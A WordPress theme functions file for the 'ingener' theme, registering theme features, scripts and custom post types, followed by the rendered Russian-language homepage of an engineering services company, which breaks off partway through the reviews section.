/** * ingener functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package ingener */ if ( ! defined( '_S_VERSION' ) ) { // Replace the version number of the theme on each release. define( '_S_VERSION', '1.0.0' ); } if ( ! function_exists( 'ingener_setup' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which * runs before the init hook. The init hook is too late for some features, such * as indicating support for post thumbnails. */ function ingener_setup() { /* * Make theme available for translation. * Translations can be filed in the /languages/ directory. * If you're building a theme based on ingener, use a find and replace * to change 'ingener' to the name of your theme in all the template files. */ load_theme_textdomain( 'ingener', get_template_directory() . '/languages' ); // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support( 'title-tag' ); /* * Enable support for Post Thumbnails on posts and pages. * * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/ */ add_theme_support( 'post-thumbnails' ); // This theme uses wp_nav_menu() in one location. register_nav_menus( array( 'menu-1' => esc_html__( 'Primary', 'ingener' ), ) ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', 'style', 'script', ) ); // Set up the WordPress core custom background feature. add_theme_support( 'custom-background', apply_filters( 'ingener_custom_background_args', array( 'default-color' => 'ffffff', 'default-image' => '', ) ) ); // Add theme support for selective refresh for widgets. add_theme_support( 'customize-selective-refresh-widgets' ); /** * Add support for core custom logo. * * @link https://codex.wordpress.org/Theme_Logo */ add_theme_support( 'custom-logo', array( 'height' => 250, 'width' => 250, 'flex-width' => true, 'flex-height' => true, ) ); } endif; add_action( 'after_setup_theme', 'ingener_setup' ); /** * Set the content width in pixels, based on the theme's design and stylesheet. * * Priority 0 to make it available to lower priority callbacks. * * @global int $content_width */ function ingener_content_width() { $GLOBALS['content_width'] = apply_filters( 'ingener_content_width', 640 ); } add_action( 'after_setup_theme', 'ingener_content_width', 0 ); /** * Register widget area. * * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar */ function ingener_widgets_init() { register_sidebar( array( 'name' => esc_html__( 'Sidebar', 'ingener' ), 'id' => 'sidebar-1', 'description' => esc_html__( 'Add widgets here.', 'ingener' ), 'before_widget' => '<section id="%1$s" class="widget %2$s">', 'after_widget' => '</section>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); } add_action( 'widgets_init', 'ingener_widgets_init' ); /** * Enqueue scripts and styles. */ function ingener_scripts() { /* start STYLES */ // Font awesome CSS wp_enqueue_style( 'fontawesome-all', get_template_directory_uri() . '/css/fontawesome/all.min.css', array(), _S_VERSION ); wp_enqueue_style( 'fontawesome-min', get_template_directory_uri() . '/css/fontawesome/fontawesome.min.css', array(), _S_VERSION ); // Bootstrap CSS wp_enqueue_style( 'bootstrap-min', get_template_directory_uri() . '/css/bootstrap/bootstrap.min.css', array(), _S_VERSION ); wp_enqueue_style( 'bootstrap-grid', get_template_directory_uri() . '/css/bootstrap/bootstrap-grid.min.css', array(), _S_VERSION ); wp_enqueue_style( 'bootstrap-reboot', get_template_directory_uri() . '/css/bootstrap/bootstrap-reboot.min.css', array(), _S_VERSION ); // Slick slider CSS wp_enqueue_style( 'slick-css', get_template_directory_uri() . '/css/slick/slick.css', array(), _S_VERSION ); // lightbox CSS wp_enqueue_style( 'lightbox-css', get_template_directory_uri() . '/css/lightbox.css', array(), _S_VERSION ); // Main CSS wp_enqueue_style( 'ingener-style', get_stylesheet_uri(), array(), _S_VERSION ); wp_style_add_data( 'ingener-style', 'rtl', 'replace' ); /* end STYLES */ /* start SCRIPTS */ wp_enqueue_script( 'ingener-navigation', get_template_directory_uri() . '/js/navigation.js', array(), _S_VERSION, true ); // jQuery JS wp_enqueue_script( 'jQuery-js', get_template_directory_uri() . '/js/jQuery.js', array(), _S_VERSION, true ); // Slick JS wp_enqueue_script( 'slick-js', get_template_directory_uri() . '/js/slick.min.js', array(), _S_VERSION, true ); // Main JS wp_enqueue_script( 'main-js', get_template_directory_uri() . '/js/script.js', array(), _S_VERSION, true ); // Lightbox JS wp_enqueue_script( 'lightbox-js', get_template_directory_uri() . '/js/lightbox.js', array(), _S_VERSION, true ); if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } /* end SCRIPTS */ // Enqueue scripts and styles only for selected pages global $post; if( is_page() || is_single() ) { switch($post->post_name) { // case 'contacts': // wp_enqueue_script('contactsJS', get_template_directory_uri() . '/js/contacts.js', array(), _S_VERSION, true); // break; // case 'services': // wp_enqueue_script('servicesJS', get_template_directory_uri() . '/js/services.js', array(), _S_VERSION, true); // break; } } if(is_front_page()) { // wp_enqueue_script('homeJS', get_template_directory_uri() . '/js/home.js', array(), _S_VERSION, true); } } add_action( 'wp_enqueue_scripts', 'ingener_scripts' ); /** * Implement the Custom Header feature. */ require get_template_directory() . '/inc/custom-header.php'; /** * Custom template tags for this theme. */ require get_template_directory() . '/inc/template-tags.php'; /** * Functions which enhance the theme by hooking into WordPress. */ require get_template_directory() . '/inc/template-functions.php'; /** * Customizer additions. */ require get_template_directory() . '/inc/customizer.php'; /** * Load Jetpack compatibility file. */ if ( defined( 'JETPACK__VERSION' ) ) { require get_template_directory() . '/inc/jetpack.php'; } /* Add Option Page for Advanced Custom Field */ add_action('acf/init', 'my_acf_op_init'); function my_acf_op_init() { // Check function exists. if( function_exists('acf_add_options_sub_page') ) { // Add parent. $parent = acf_add_options_page(array( 'page_title' => 'Ingener Theme', 'menu_title' => 'Ingener Theme', 'icon_url' => 'dashicons-align-right', // Add this line and replace the second inverted commas with class of the icon you like 'position' => 29, 'redirect' => false, )); // Add sub pages $child = acf_add_options_sub_page(array( 'page_title' => 'Header', 'menu_title' => 'Header', 'parent_slug' => $parent['menu_slug'], )); $child2 = acf_add_options_sub_page(array( 'page_title' => 'Footer', 'menu_title' => 'Footer', 'parent_slug' => $parent['menu_slug'], )); } } /* Custom post type Services */ function post_services() { $labels = array( 'name' => _x( 'Services', 'Post Type General Name', 'ingener' ), 'singular_name' => _x( 'Services', 'Post Type Singular Name', 'ingener' ), 'menu_name' => __( 'Services', 'ingener' ), 'name_admin_bar' => __( 'Services', 'ingener' ), 'archives' => __( 'Services Archives', 'ingener' ), 'attributes' => __( 'Services Attributes', 'ingener' ), 'parent_item_colon' => __( 'Parent Item:', 'ingener' ), 'all_items' => __( 'All Items', 'ingener' ), 'add_new_item' => __( 'Add New Item', 'ingener' ), 'add_new' => __( 'Add New', 'ingener' ), 'new_item' => __( 'New Item', 'ingener' ), 'edit_item' => __( 'Edit Item', 'ingener' ), 'update_item' => __( 'Update Item', 'ingener' ), 'view_item' => __( 'View Item', 'ingener' ), 'view_items' => __( 'View Items', 'ingener' ), 'search_items' => __( 'Search Item', 'ingener' ), 'not_found' => __( 'Not found', 'ingener' ), 'not_found_in_trash' => __( 'Not found in Trash', 'ingener' ), 'featured_image' => __( 'Featured Image', 'ingener' ), 'set_featured_image' => __( 'Set featured image', 'ingener' ), 'remove_featured_image' => __( 'Remove featured image', 'ingener' ), 'use_featured_image' => __( 'Use as featured image', 'ingener' ), 'insert_into_item' => __( 'Insert into item', 'ingener' ), 'uploaded_to_this_item' => __( 'Uploaded to this item', 'ingener' ), 'items_list' => __( 'Items list', 'ingener' ), 'items_list_navigation' => __( 'Items list navigation', 'ingener' ), 'filter_items_list' => __( 'Filter items list', 'ingener' ), ); $args = array( 'label' => __( 'Services', 'ingener' ), 'description' => __( 'Post Type Description', 'ingener' ), 'labels' => $labels, 'supports' => array( 'title', 'editor', 'thumbnail', 'excerpt' ), 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'menu_position' => 5, 'show_in_admin_bar' => true, 'show_in_nav_menus' => true, 'can_export' => true, 'has_archive' => true, 'exclude_from_search' => false, 'publicly_queryable' => true, 'capability_type' => 'page', 'menu_icon' => 'dashicons-feedback', ); register_post_type( 'post-services', $args ); } add_action( 'init', 'post_services', 0 ); /* Custom post type Projects */ function post_type_projects() { $labels = array( 'name' => _x( 'Projects', 'Post Type General Name', 'in' ), 'singular_name' => _x( 'Projects', 'Post Type Singular Name', 'in' ), 'menu_name' => __( 'Projects', 'in' ), 'name_admin_bar' => __( 'Projects', 'in' ), 'archives' => __( 'Projects Archives', 'in' ), 'attributes' => __( 'Projects Attributes', 'in' ), 'parent_item_colon' => __( 'Parent Item:', 'in' ), 'all_items' => __( 'All Items', 'in' ), 'add_new_item' => __( 'Add New Item', 'in' ), 'add_new' => __( 'Add New', 'in' ), 'new_item' => __( 'New Item', 'in' ), 'edit_item' => __( 'Edit Item', 'in' ), 'update_item' => __( 'Update Item', 'in' ), 'view_item' => __( 'View Item', 'in' ), 'view_items' => __( 'View Items', 'in' ), 'search_items' => __( 'Search Item', 'in' ), 'not_found' => __( 'Not found', 'in' ), 'not_found_in_trash' => __( 'Not found in Trash', 'in' ), 'featured_image' => __( 'Featured Image', 'in' ), 'set_featured_image' => __( 'Set featured image', 'in' ), 'remove_featured_image' => __( 'Remove featured image', 'in' ), 'use_featured_image' => __( 'Use as featured image', 'in' ), 'insert_into_item' => __( 'Insert into item', 'in' ), 'uploaded_to_this_item' => __( 'Uploaded to this item', 'in' ), 'items_list' => __( 'Items list', 'in' ), 'items_list_navigation' => __( 'Items list navigation', 'in' ), 'filter_items_list' => __( 'Filter items list', 'in' ), ); $args = array( 'label' => __( 'Projects', 'in' ), 'description' => __( 'Post Type Description', 'in' ), 'labels' => $labels, 'supports' => array( 'title', 'editor', 'thumbnail' ), 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'menu_position' => 5, 'show_in_admin_bar' => true, 'show_in_nav_menus' => true, 'can_export' => true, 'has_archive' => true, 'exclude_from_search' => false, 'publicly_queryable' => true, 'capability_type' => 'page', 'menu_icon' => 'dashicons-images-alt2', ); register_post_type( 'post-projects', $args ); } add_action( 'init', 'post_type_projects', 0 ); /* Custom post type Testimonials */ function post_type_testimonials() { $labels = array( 'name' => _x( 'Testimonials', 'Post Type General Name', 'in' ), 'singular_name' => _x( 'Testimonials', 'Post Type Singular Name', 'in' ), 'menu_name' => __( 'Testimonials', 'in' ), 'name_admin_bar' => __( 'Testimonials', 'in' ), 'archives' => __( 'Testimonials Archives', 'in' ), 'attributes' => __( 'Testimonials Attributes', 'in' ), 'parent_item_colon' => __( 'Parent Item:', 'in' ), 'all_items' => __( 'All Items', 'in' ), 'add_new_item' => __( 'Add New Item', 'in' ), 'add_new' => __( 'Add New', 'in' ), 'new_item' => __( 'New Item', 'in' ), 'edit_item' => __( 'Edit Item', 'in' ), 'update_item' => __( 'Update Item', 'in' ), 'view_item' => __( 'View Item', 'in' ), 'view_items' => __( 'View Items', 'in' ), 'search_items' => __( 'Search Item', 'in' ), 'not_found' => __( 'Not found', 'in' ), 'not_found_in_trash' => __( 'Not found in Trash', 'in' ), 'featured_image' => __( 'Featured Image', 'in' ), 'set_featured_image' => __( 'Set featured image', 'in' ), 'remove_featured_image' => __( 'Remove featured image', 'in' ), 'use_featured_image' => __( 'Use as featured image', 'in' ), 'insert_into_item' => __( 'Insert into item', 'in' ), 'uploaded_to_this_item' => __( 'Uploaded to this item', 'in' ), 'items_list' => __( 'Items list', 'in' ), 'items_list_navigation' => __( 'Items list navigation', 'in' ), 'filter_items_list' => __( 'Filter items list', 'in' ), ); $args = array( 'label' => __( 'Testimonials', 'in' ), 'description' => __( 'Post Type Description', 'in' ), 'labels' => $labels, 'supports' => array( 'title', 'editor', 'thumbnail' ), 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'menu_position' => 5, 'show_in_admin_bar' => true, 'show_in_nav_menus' => true, 'can_export' => true, 'has_archive' => true, 'exclude_from_search' => false, 'publicly_queryable' => true, 'capability_type' => 'page', 'menu_icon' => 'dashicons-format-status' ); register_post_type( 'post-testimonials', $args ); } add_action( 'init', 'post_type_testimonials', 0 ); // <!-- go Custom Shortcode --> function custom_shortcode( ) { return get_field("sales_section_percent"); } add_shortcode( 'shortcode', 'custom_shortcode' ); ?> <!doctype html> <html lang="ru-RU"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/inginer.md\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.18"}}; !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://inginer.md/wp-includes/css/dist/block-library/style.min.css?ver=5.5.18' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://inginer.md/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3' type='text/css' media='all' /> <script type='text/javascript' src='https://inginer.md/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script> <link rel="https://api.w.org/" href="https://inginer.md/wp-json/" /><link rel="alternate" type="application/json" href="https://inginer.md/wp-json/wp/v2/pages/11" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://inginer.md/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://inginer.md/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.5.18" /> <link rel="canonical" href="https://inginer.md/" /> <link rel='shortlink' href='https://inginer.md/' /> <link rel="alternate" type="application/json+oembed" href="https://inginer.md/wp-json/oembed/1.0/embed?url=https%3A%2F%2Finginer.md%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://inginer.md/wp-json/oembed/1.0/embed?url=https%3A%2F%2Finginer.md%2F&format=xml" /> <style type="text/css"> .qtranxs_flag_ro {background-image: url(https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ro.png); background-repeat: no-repeat;} .qtranxs_flag_ru {background-image: url(https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ru.png); background-repeat: no-repeat;} </style> <link hreflang="ro" href="https://inginer.md/ro/" rel="alternate" /> <link hreflang="ru" href="https://inginer.md/ru/" rel="alternate" /> <link hreflang="x-default" href="https://inginer.md/" rel="alternate" /> <meta name="generator" content="qTranslate-XT 3.8.1" /> <link rel="icon" href="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-32x32.jpg" sizes="32x32" /> <link rel="icon" href="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon" href="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-180x180.jpg" /> <meta name="msapplication-TileImage" content="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-270x270.jpg" /> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-11S0L0M3X7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-11S0L0M3X7'); </script> </head> <body class="home page-template-default page page-id-11"> <div class="app"> <header> <div class="top-header"> <div class="container"> <div class="row center"> <div class="col-lg-2 col-md-6 col-xs-6 col-6 col-sm-6 logo"><a href="https://inginer.md"><img src="https://inginer.md/wp-content/uploads/2020/11/logo.png" alt=""></a></div> <div class="col-lg-6 menu"> <div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-610" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-610"><a href="https://inginer.md/about-us/">О нас</a></li> <li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27"><a href="https://inginer.md/services/">Услуги</a></li> <li id="menu-item-477" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-477"><a href="https://inginer.md/proekty/">Проекты</a></li> <li id="menu-item-25" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-25"><a href="https://inginer.md/contacts/">Контакты</a></li> <li id="menu-item-846" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-846"><a href="https://inginer.md/news/">Полезные советы</a></li> </ul></div> <!-- <ul> <li><a href="services.php">Услуги</a> <ul class='drop-down'> <li><a href="">Тест2</a></li> <li><a href="">Тест123</a></li> <li><a href="">Нетест</a></li> </ul> </li> <li><a href="about.php">О нас</a> <ul class='drop-down'> <li><a href="">Тест2</a></li> <li><a href="">Тест123</a></li> <li><a href="">Нетест</a></li> </ul> </li> <li><a href="news.php">Новости</a></li> <li><a href="contacts.php">Контакты</a></li> </ul> --> </div> <div class="col-lg-4 right-top-menu"> <a href="tel:022-21-20-21">022-21-20-21</a> <a href="tel:0790-555-44">0790-555-44</a> <ul class="language-chooser language-chooser-image qtranxs_language_chooser" id="qtranslate-chooser"> <li class="lang-ro"><a href="https://inginer.md/ro/" hreflang="ro" title="Română (ro)" class="qtranxs_image qtranxs_image_ro"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ro.png" alt="Română (ro)" /><span style="display:none">Română</span></a></li> <li class="lang-ru active"><a href="https://inginer.md/ru/" hreflang="ru" title="Русский (ru)" class="qtranxs_image qtranxs_image_ru"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ru.png" alt="Русский (ru)" /><span style="display:none">Русский</span></a></li> </ul><div class="qtranxs_widget_end"></div> </div> <div class="col-md-4 col-xs-4 col-sm-4 col-4 clear-head"></div> <div class="menu-mobile col-md-2 col-xs-2 col-sm-2 col-2"> <div class="burger"> <div class="burger__item burger__item--top"></div> <div class="burger__item burger__item--mid"></div> <div class="burger__item burger__item--bottom"></div> </div> </div> </div> </div> </div> <div class="language__box"> <ul class="language-chooser language-chooser-image qtranxs_language_chooser" id="qtranslate-chooser"> <li class="lang-ro"><a href="https://inginer.md/ro/" hreflang="ro" title="Română (ro)" class="qtranxs_image qtranxs_image_ro"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ro.png" alt="Română (ro)" /><span style="display:none">Română</span></a></li> <li class="lang-ru active"><a href="https://inginer.md/ru/" hreflang="ru" title="Русский (ru)" class="qtranxs_image qtranxs_image_ru"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ru.png" alt="Русский (ru)" /><span style="display:none">Русский</span></a></li> </ul><div class="qtranxs_widget_end"></div> </div> </header> <div class="content-mid"> <div class="slider-main"> </div> </div> <div class="title"> Наши услуги </div> <div class="container pb-40"> <div class="row"> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/proektirovanie/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Проектирование </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/proektirovanie/"> Подробнее </a></div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/echipamente/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Комплектация оборудованием </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/echipamente/"> Подробнее </a></div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/montazh/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Монтаж </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/montazh/"> Подробнее </a></div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/test/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Сервисное обслуживание </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/test/"> Подробнее </a></div> </div> </div> </div> </div> <div class="form-sale" style="background-image: url()"> <div class="plenka"></div> <div class="form-for-sale mt-30"> <div class="title-form-sale center"> Напиши нам и получи скидку на установку в 15% </div> <div role="form" class="wpcf7" id="wpcf7-f104-o1" lang="en-US" dir="ltr"> <div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div> <form action="/#wpcf7-f104-o1" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="104" /> <input type="hidden" name="_wpcf7_version" value="5.3" /> <input type="hidden" name="_wpcf7_locale" value="en_US" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f104-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="_wpcf7_posted_data_hash" value="" /> </div> <div class="center"> <div class="row form-sale-inputs"> <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12"> <span class="wpcf7-form-control-wrap your-name"><input type="text" name="your-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required important" id="name_sale" aria-required="true" aria-invalid="false" placeholder="Имя" /></span> </div> <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12"> <span class="wpcf7-form-control-wrap your-email"><input type="email" name="your-email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email important" id="name_sale" aria-required="true" aria-invalid="false" placeholder="Электронная почта" /></span> </div> <div class="col-lg-4 sales__button"> <input type="submit" value="Получить скидку" class="wpcf7-form-control wpcf7-submit" /> </div> </div> </div> <div class="wpcf7-response-output" aria-hidden="true"></div></form></div> </div> </div> <div class="counter-block"> <div class="container"> <div class="row center"> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="far fa-check-circle"></i></div> <div class="col-lg-9"> <div class="count">10000</div> <div class="title-count">Благодарных клиентов</div> </div> </div></div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="fas fa-receipt"></i></div> <div class="col-lg-9"> <div class="count">8000</div> <div class="title-count">Установленных систем</div> </div> </div></div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="far fa-sun"></i></div> <div class="col-lg-9"> <div class="count">20</div> <div class="title-count">Лет на рынке</div> </div> </div></div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="far fa-smile"></i></i></div> <div class="col-lg-9"> <div class="count">2500</div> <div class="title-count">Отзывов</div> </div> </div></div> </div> </div> </div> <div class="container pb-80"> <div class="small-title">Мы не боимся показать свою работу</div> <div class="title">Реализованые проекты</div> <div class="slider"> <div class="slider-projects"> <div class="slide-proj"> <a href="https://inginer.md/zhiloj-kompeks-testimiczianu/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-2.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-2.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-2-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Компекс «Тестимициану» </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/zavod-genesis/"> <div class="img-block-proj"> <img src="" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Завод «Genesis» </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/gosudarstvennaya-registraczionnaya-pal/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-1.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-1-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Государственная регистрационная палата </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/administrativnoe-zdanie-otel/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-3.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-3.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-3-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Административное здание. Отель </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/otel-kodru/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-4.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-4.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-4-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Отель «Кодру» </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/montazh-sistem-v-prizidenture/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-5.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-5.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-5-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Президентура Республики Молдова </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> </div> <div class="prev-proj"><i class="fas fa-chevron-left"></i></div> <div class="next-proj"><i class="fas fa-chevron-right"></i></div> </div> </div> <div class="container"> <div class="small-title">Что наши клиенты</div> <div class="title">Говорят он нас</div> <div class="review"> <div class="row slider-reviews"> <div class="col-lg-4"> <div class="head-review center"> <div class=""> <div class="name-reviews">Валерий Буцан</div> <div class="company-reviews">SALONIX</div> <div class="stars-reviews"> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> </div> <div class="text-reviews">«Мы рекомендуем компанию« Piroterm-Service »SRL и ее сотрудников как надежного партнера, который вовремя выполняет свои договорные обязательства, предлагая оперативные услуги по конкурентоспособным ценам».</div> </div> </div> </div> <div class="col-lg-4"> <div class="head-review center"> <div class=""> <div class="name-reviews">Пушкару Светлана</div> <div class="company-reviews"></div> <div class="stars-reviews"> <i class="fas 